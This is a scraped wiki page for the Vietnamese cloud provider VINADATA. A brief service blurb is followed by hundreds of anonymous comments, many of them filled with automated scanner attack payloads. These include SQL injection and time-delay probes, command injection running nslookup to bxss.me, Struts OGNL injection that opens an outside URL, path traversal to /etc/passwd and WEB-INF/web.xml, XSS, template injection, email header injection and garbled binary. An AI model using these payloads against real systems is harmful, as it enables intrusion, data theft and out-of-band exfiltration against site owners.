Page tree
8199688953
612-965-3218


VINADATA UPTIME BUSSINESS

Công nghệ tiên tiến + Hạ tầng hiện đại

Thiết kế dự phòng + giám sát chặt chẽ, đảm bảo UPTIME 99.99%. Được trang bị các tính năng bảo mật: Firewall, VPN, SSH, Security Group


VINADATA cung cấp những dịch vụ sau

Cloud Server - Lựa chọn cấu hình phù hợp và dễ dàng tăng thêm/ giảm bớt khi cần thiết. 

CDN/ VOD - Giải pháp đa dạng, phục vụ xem video lưu lượng truy cập lớn.

TAPE Backup - Bảo quản băng từ dự phòng.

Low Cost Storage - Lưu trữ dung lượng lớn giá rẻ. Giải pháp cho việc lưu trữ backup dài hạn.

Container as a Services - Kubernetes and Swarm Orchestration cho các VCS.

Cloud Watcher - Monitor as a Services and Log as a Services. 


Recent space activity

Space contributors

{"mode":"list","scope":"descendants","limit":"5","showLastTime":"true","order":"update","contextEntityId":1769588}

 

 • No labels

488 Comments

 1. Anonymous

 2. Anonymous

 3. Anonymous

 4. Anonymous

 5. Anonymous

 6. Anonymous

  -1' OR 2+447-447-1=0+0+0+1 --
 7. Anonymous

  -1" OR 2+294-294-1=0+0+0+1 --
 8. Anonymous

  -1; waitfor delay '0:0:6' --
 9. Anonymous

  -1); waitfor delay '0:0:6' --
 10. Anonymous

  1 waitfor delay '0:0:6' --
 11. Anonymous

  JvIoP73P'; waitfor delay '0:0:9' --
 12. Anonymous

  -1;select pg_sleep(9); --
 13. Anonymous

  -1);select pg_sleep(9); --
 14. Anonymous

  -1));select pg_sleep(9); --
 15. Anonymous

  NEPTRZed';select pg_sleep(9); --
 16. Anonymous

  ZvGLx4OQ');select pg_sleep(9); --
 17. Anonymous

  tPmBK5WH'));select pg_sleep(3); --
 18. Anonymous

  1||UTL_INADDR.get_host_address('dns.'||'sqli.046758.8-5809.8.23567.1.bxss'||'.me')
 19. Anonymous

  '||UTL_INADDR.get_host_address('dns.'||'sqli.046758.8-5820.8.23567.1.bxss'||'.me')||'
 20. Anonymous

  1;copy (select '') to program 'nslookup dns.sqli.\046758.8-5828.8.23567.\1.bxss.me'
 21. Anonymous

  set|set&set
 22. Anonymous

  1';copy (select '') to program 'nslookup dns.sqli.\046758.8-5841.8.23567.\1.bxss.me
 23. Anonymous

 24. Anonymous

  $(nslookup dns.ce.\046758.8-5843.8.23567.\1.bxss.me)
 25. Anonymous

  &nslookup dns.ce.\046758.8-5855.8.23567.\1.bxss.me&'\"`0&nslookup dns.ce.\046758.8-5855.8.23567.\1.bxss.me&`'
 26. Anonymous

  ../../../../../../../../../../etc/passwd
 27. Anonymous

  ../../../../../../../../../../../../../../../proc/version
 28. Anonymous

  ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
 29. Anonymous

  ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
 30. Anonymous

  .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
 31. Anonymous

 32. Anonymous

  %2fetc%2fpasswd
 33. Anonymous

  /.././.././.././.././.././.././.././../etc/./passwd%00
 34. Anonymous

  ../../../../../../../../../../../../../../../../etc/passwd
 35. Anonymous

  ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
 36. Anonymous

  ..��..��..��..��..��..��..��..��etc/passwd
 37. Anonymous

  invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
 38. Anonymous

  file://etc/passwd
 39. Anonymous

  /\../\../\../\../\../\../\../etc/passwd
 40. Anonymous

  WEB-INF/web.xml
 41. Anonymous

  /WEB-INF/web.xml
 42. Anonymous

  WEB-INF\web.xml
 43. Anonymous

  /WEB-INF/web.xml
 44. Anonymous

  /static/WEB-INF/web.xml
 45. Anonymous

  /forward:/WEB-INF/web.xml
 46. Anonymous

  ./WEB-INF/web.xml
 47. Anonymous

  ./WEB-INF/web.xml?
 48. Anonymous

  ../WEB-INF/web.xml
 49. Anonymous

  ../WEB-INF/web.xml?
 50. Anonymous

  ../../WEB-INF/web.xml
 51. Anonymous

  ../../WEB-INF/web.xml?
 52. Anonymous

  /..\..WEB-INFweb.xml
 53. Anonymous

  ../../../WEB-INF/web.xml
 54. Anonymous

  ../../../WEB-INF/web.xml?
 55. Anonymous

  ../../../../WEB-INF/web.xml
 56. Anonymous

  /../..../..../WEB-INF/web.xml
 57. Anonymous

  ../../../../../WEB-INF/web.xml
 58. Anonymous

  ../../../../../../WEB-INF/web.xml
 59. Anonymous

  ../WEB-INF/web.xml;x=
 60. Anonymous

  ../../WEB-INF/web.xml;x=
 61. Anonymous

  ../../../WEB-INF/web.xml;x=
 62. Anonymous

  ${9999112+10000023}
 63. Anonymous

  #{9999112+10000023}
 64. Anonymous

  /some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
 65. Anonymous

  /testasp.vulnweb.com/t/fit.txt
 66. Anonymous

  /testasp.vulnweb.com/t/fit.txt?.jpg
 67. Anonymous

  testasp.vulnweb.com
 68. Anonymous

  1&n908494=v934018
 69. Anonymous

 70. Anonymous

  !(()&&!|*|*|
 71. Anonymous

  ^(#$!@#$)(()))******
 72. Anonymous

 73. Anonymous

  /testasp.vulnweb.com/t/xss.html?%00.jpg
 74. Anonymous

  ;print(md5(acunetix_wvs_security_test));
 75. Anonymous

  ';print(md5(acunetix_wvs_security_test));$a='
 76. Anonymous

  ";print(md5(acunetix_wvs_security_test));$a="
 77. Anonymous

  ${@print(md5(acunetix_wvs_security_test))}
 78. Anonymous

  ${@print(md5(acunetix_wvs_security_test))}\
 79. Anonymous

  doaddcomment.action
 80. Anonymous

  doaddcomment.action/.
 81. Anonymous

  1 bcc:046758.8-5939.8.23567.1@bxss.me
 82. Anonymous

  to@example.com> bcc:046758.8-5942.8.23567.1@bxss.me
 83. Anonymous

  1'),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+':/hitaRw1yBYAKg.bxss.me/').openStream().close(),new java.lang.String('
 84. Anonymous

 85. Anonymous

 86. Anonymous

 87. Anonymous

 88. Anonymous

  �'�"
 89. Anonymous

  �''�""
 90. Anonymous

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 91. Anonymous

  /hita8lAUTbpB0.bxss.me/
 92. Anonymous

  /www.vulnweb.com
 93. Anonymous

 94. Anonymous

 95. Anonymous

 96. Anonymous

 97. Anonymous

  acu10704<s1﹥s2ʺs3ʹuca10704
 98. Anonymous

  acux4337��z1��z2a�bcxuca4337
 99. Anonymous

  CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
 100. Anonymous

  {{9999235*10000446}}
 101. Anonymous

 102. Anonymous

  1FJEJG[!+!]
 103. Anonymous

 104. Anonymous

 105. Anonymous

 106. Anonymous

 107. Anonymous

 108. Anonymous

 109. Anonymous

 110. Anonymous

 111. Anonymous

  1" onerror=alert(9969)>
 112. Anonymous

  %31%3C%53%63%52%69%50%74%20%3E%6C%7A%41%69%289260%29%3C%2F%73%43%72%69%70%54%3E
 113. Anonymous

  1\u003CScRiPt\lzAi(9502)\u003C/sCripT\u003E
 114. Anonymous

  1<ScRiPt>lzAi(9014)</sCripT>
 115. Anonymous

 116. Anonymous

 117. Anonymous

  [url=/www.vulnweb.com][/url]
 118. Anonymous

  1 src=x onerror=alert(9485);/>
 119. Anonymous

  1}body{acu:Expre/**/SSion(lzAi(9679))}
 120. Anonymous

  1<% contenteditable onresize=lzAi(9166)>
 121. Anonymous

 122. Anonymous

  1CL2QO[!+!]
 123. Anonymous

 124. Anonymous

 125. Anonymous

 126. Anonymous

 127. Anonymous

 128. Anonymous

 129. Anonymous

 130. Anonymous

 131. Anonymous

 132. Anonymous

 133. Anonymous

 134. Anonymous

 135. Anonymous

 136. Anonymous

 137. Anonymous

 138. Anonymous

 139. Anonymous

 140. Anonymous

 141. Anonymous

 142. Anonymous

 143. Anonymous

 144. Anonymous

 145. Anonymous

 146. Anonymous

 147. Anonymous

 148. Anonymous

 149. Anonymous

 150. Anonymous

 151. Anonymous

 152. Anonymous

 153. Anonymous

 154. Anonymous

 155. Anonymous

 156. Anonymous

 157. Anonymous

 158. Anonymous

 159. Anonymous

 160. Anonymous

 161. Anonymous

 162. Anonymous

 163. Anonymous

 164. Anonymous

 165. Anonymous

 166. Anonymous

 167. Anonymous

 168. Anonymous

 169. Anonymous

 170. Anonymous

 171. Anonymous

 172. Anonymous

 173. Anonymous

 174. Anonymous

 175. Anonymous

 176. Anonymous

 177. Anonymous

 178. Anonymous

 179. Anonymous

 180. Anonymous

 181. Anonymous

 182. Anonymous

 183. Anonymous

 184. Anonymous

 185. Anonymous

 186. Anonymous

 187. Anonymous

 188. Anonymous

 189. Anonymous

 190. Anonymous

 191. Anonymous

 192. Anonymous

 193. Anonymous

 194. Anonymous

 195. Anonymous

 196. Anonymous

 197. Anonymous

 198. Anonymous

 199. Anonymous

 200. Anonymous

  response.write(9684973*9241287)
 201. Anonymous

  '+response.write(9684973*9241287)+'
 202. Anonymous

  "+response.write(9684973*9241287)+"
 203. Anonymous

 204. Anonymous

 205. Anonymous

 206. Anonymous

 207. Anonymous

  ${9999425+10000302}
 208. Anonymous

  #{9999425+10000302}
 209. Anonymous

 210. Anonymous

 211. Anonymous

 212. Anonymous

 213. Anonymous

  /some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
 214. Anonymous

  /testasp.vulnweb.com/t/fit.txt
 215. Anonymous

  /testasp.vulnweb.com/t/fit.txt?.jpg
 216. Anonymous

  testasp.vulnweb.com
 217. Anonymous

 218. Anonymous

 219. Anonymous

  1&n951087=v946797
 220. Anonymous

 221. Anonymous

 222. Anonymous

 223. Anonymous

 224. Anonymous

  !(()&&!|*|*|
 225. Anonymous

  ^(#$!@#$)(()))******
 226. Anonymous

 227. Anonymous

 228. Anonymous

 229. Anonymous

 230. Anonymous

  /testasp.vulnweb.com/t/xss.html?%00.jpg
 231. Anonymous

 232. Anonymous

 233. Anonymous

 234. Anonymous

 235. Anonymous

 236. Anonymous

 237. Anonymous

 238. Anonymous

  ;print(md5(acunetix_wvs_security_test));
 239. Anonymous

  ';print(md5(acunetix_wvs_security_test));$a='
 240. Anonymous

  ";print(md5(acunetix_wvs_security_test));$a="
 241. Anonymous

  ${@print(md5(acunetix_wvs_security_test))}
 242. Anonymous

  ${@print(md5(acunetix_wvs_security_test))}\
 243. Anonymous

  doaddcomment.action
 244. Anonymous

  doaddcomment.action/.
 245. Anonymous

 246. Anonymous

 247. Anonymous

  /hitcxciKUXTfi.bxss.me/
 248. Anonymous

  $(nslookup dns.ce.\046758.8-17149.8.5840d.\1.bxss.me)
 249. Anonymous

  &nslookup dns.ce.\046758.8-17151.8.5840d.\1.bxss.me&'\"`0&nslookup dns.ce.\046758.8-17151.8.5840d.\1.bxss.me&`'
 250. Anonymous

 251. Anonymous

  1'),request,#_memberAccess['allowPrivateAccess']=true,#_memberAccess['allowProtectedAccess']=true,#_memberAccess['allowPackageProtectedAccess']=true,#_memberAccess['allowStaticMethodAccess']=true,#_memberAccess['excludedPackageNamePatterns']=#_memberAccess['acceptProperties'],#_memberAccess['excludedClasses']=#_memberAccess['acceptProperties'],new java.net.URL('http'+':/hitbdtkWLsAgK.bxss.me/').openStream().close(),new java.lang.String('
 252. Anonymous

 253. Anonymous

 254. Anonymous

 255. Anonymous

 256. Anonymous

 257. Anonymous

 258. Anonymous

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
 259. Anonymous

  1'>"><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,046758,8-17179,8,5840d,%22%5D" />
 260. Anonymous

 261. Anonymous

 262. Anonymous

 263. Anonymous

  �'�"
 264. Anonymous

  �''�""
 265. Anonymous

  /www.vulnweb.com
 266. Anonymous

 267. Anonymous

 268. Anonymous

 269. Anonymous

 270. Anonymous

 271. Anonymous

 272. Anonymous

 273. Anonymous

 274. Anonymous

 275. Anonymous

 276. Anonymous

 277. Anonymous

 278. Anonymous

 279. Anonymous

 280. Anonymous

 281. Anonymous

 282. Anonymous

 283. Anonymous

 284. Anonymous

 285. Anonymous

 286. Anonymous

 287. Anonymous

 288. Anonymous

 289. Anonymous

 290. Anonymous

 291. Anonymous

 292. Anonymous

 293. Anonymous

 294. Anonymous

 295. Anonymous

 296. Anonymous

 297. Anonymous

 298. Anonymous

 299. Anonymous

 300. Anonymous

 301. Anonymous

 302. Anonymous

 303. Anonymous

 304. Anonymous

 305. Anonymous

 306. Anonymous

 307. Anonymous

  1 bcc:046758.8-17275.8.5840d.1@bxss.me
 308. Anonymous

  to@example.com> bcc:046758.8-17277.8.5840d.1@bxss.me
 309. Anonymous

  ../../../../../../../../../../etc/passwd
 310. Anonymous

  ../../../../../../../../../../../../../../../proc/version
 311. Anonymous

  ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
 312. Anonymous

  ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
 313. Anonymous

  .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
 314. Anonymous

  /etc/passwd
 315. Anonymous

  %2fetc%2fpasswd
 316. Anonymous

  /.././.././.././.././.././.././.././../etc/./passwd%00
 317. Anonymous

  ../../../../../../../../../../../../../../../../etc/passwd
 318. Anonymous

  ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
 319. Anonymous

  ..��..��..��..��..��..��..��..��etc/passwd
 320. Anonymous

  invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
 321. Anonymous

  file://etc/passwd
 322. Anonymous

  /\../\../\../\../\../\../\../etc/passwd
 323. Anonymous

  WEB-INF/web.xml
 324. Anonymous

  /WEB-INF/web.xml
 325. Anonymous

  WEB-INF\web.xml
 326. Anonymous

  /WEB-INF/web.xml
 327. Anonymous

  /static/WEB-INF/web.xml
 328. Anonymous

  /forward:/WEB-INF/web.xml
 329. Anonymous

  ./WEB-INF/web.xml
 330. Anonymous

  ./WEB-INF/web.xml?
 331. Anonymous

  ../WEB-INF/web.xml
 332. Anonymous

  ../WEB-INF/web.xml?
 333. Anonymous

  ../../WEB-INF/web.xml
 334. Anonymous

  ../../WEB-INF/web.xml?
 335. Anonymous

  /..\..WEB-INFweb.xml
 336. Anonymous

  ../../../WEB-INF/web.xml
 337. Anonymous

  ../../../WEB-INF/web.xml?
 338. Anonymous

  ../../../../WEB-INF/web.xml
 339. Anonymous

  /../..../..../WEB-INF/web.xml
 340. Anonymous

  ../../../../../WEB-INF/web.xml
 341. Anonymous

  ../../../../../../WEB-INF/web.xml
 342. Anonymous

  ../WEB-INF/web.xml;x=
 343. Anonymous

  ../../WEB-INF/web.xml;x=
 344. Anonymous

  ../../../WEB-INF/web.xml;x=
 345. Anonymous

 346. Anonymous

 347. Anonymous

  -1 OR 2+789-789-1=0+0+0+1 --
 348. Anonymous

  -1 OR 2+16-16-1=0+0+0+1
 349. Anonymous

  -1' OR 2+268-268-1=0+0+0+1 --
 350. Anonymous

 351. Anonymous

  -1' OR 2+613-613-1=0+0+0+1 or 'FHUsGny8'='
 352. Anonymous

  -1" OR 2+504-504-1=0+0+0+1 --
 353. Anonymous

  if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/
 354. Anonymous

  (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
 355. Anonymous

  -1; waitfor delay '0:0:6' --
 356. Anonymous

  -1); waitfor delay '0:0:6' --
 357. Anonymous

  1 waitfor delay '0:0:6' --
 358. Anonymous

  GlxHeTFK'; waitfor delay '0:0:6' --
 359. Anonymous

  -1;select pg_sleep(6); --
 360. Anonymous

  -1);select pg_sleep(9); --
 361. Anonymous

  -1));select pg_sleep(9); --
 362. Anonymous

  QfahKp9D';select pg_sleep(9); --
 363. Anonymous

  Y3bmV5LN');select pg_sleep(9); --
 364. Anonymous

  NuI4Qknz'));select pg_sleep(9); --
 365. Anonymous

  1||UTL_INADDR.get_host_address('dns.'||'sqli.046758.8-17350.8.5840d.1.bxss'||'.me')
 366. Anonymous

  '||UTL_INADDR.get_host_address('dns.'||'sqli.046758.8-17355.8.5840d.1.bxss'||'.me')||'
 367. Anonymous

 368. Anonymous

  1;copy (select '') to program 'nslookup dns.sqli.\046758.8-17358.8.5840d.\1.bxss.me'
 369. Anonymous

  1';copy (select '') to program 'nslookup dns.sqli.\046758.8-17360.8.5840d.\1.bxss.me
 370. Anonymous

 371. Anonymous

 372. Anonymous

 373. Anonymous

 374. Anonymous

 375. Anonymous

 376. Anonymous

 377. Anonymous

 378. Anonymous

  acu5035<s1﹥s2ʺs3ʹuca5035
 379. Anonymous

  acux8474��z1��z2a�bcxuca8474
 380. Anonymous

  CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F�G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)�x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
 381. Anonymous

  {{9999384*9999044}}
 382. Anonymous

 383. Anonymous

  1DH6UP[!+!]
 384. Anonymous

 385. Anonymous

 386. Anonymous

 387. Anonymous

 388. Anonymous

 389. Anonymous

 390. Anonymous

  1" onerror=alert(9525)>
 391. Anonymous

  %31%3C%53%63%52%69%50%74%20%3E%66%36%48%66%289363%29%3C%2F%73%43%72%69%70%54%3E
 392. Anonymous

  1\u003CScRiPt\f6Hf(9088)\u003C/sCripT\u003E
 393. Anonymous

  1<ScRiPt>f6Hf(9353)</sCripT>
 394. Anonymous

 395. Anonymous

 396. Anonymous

 397. Anonymous

  [url=/www.vulnweb.com][/url]
 398. Anonymous

  1 src=x onerror=alert(9007);/>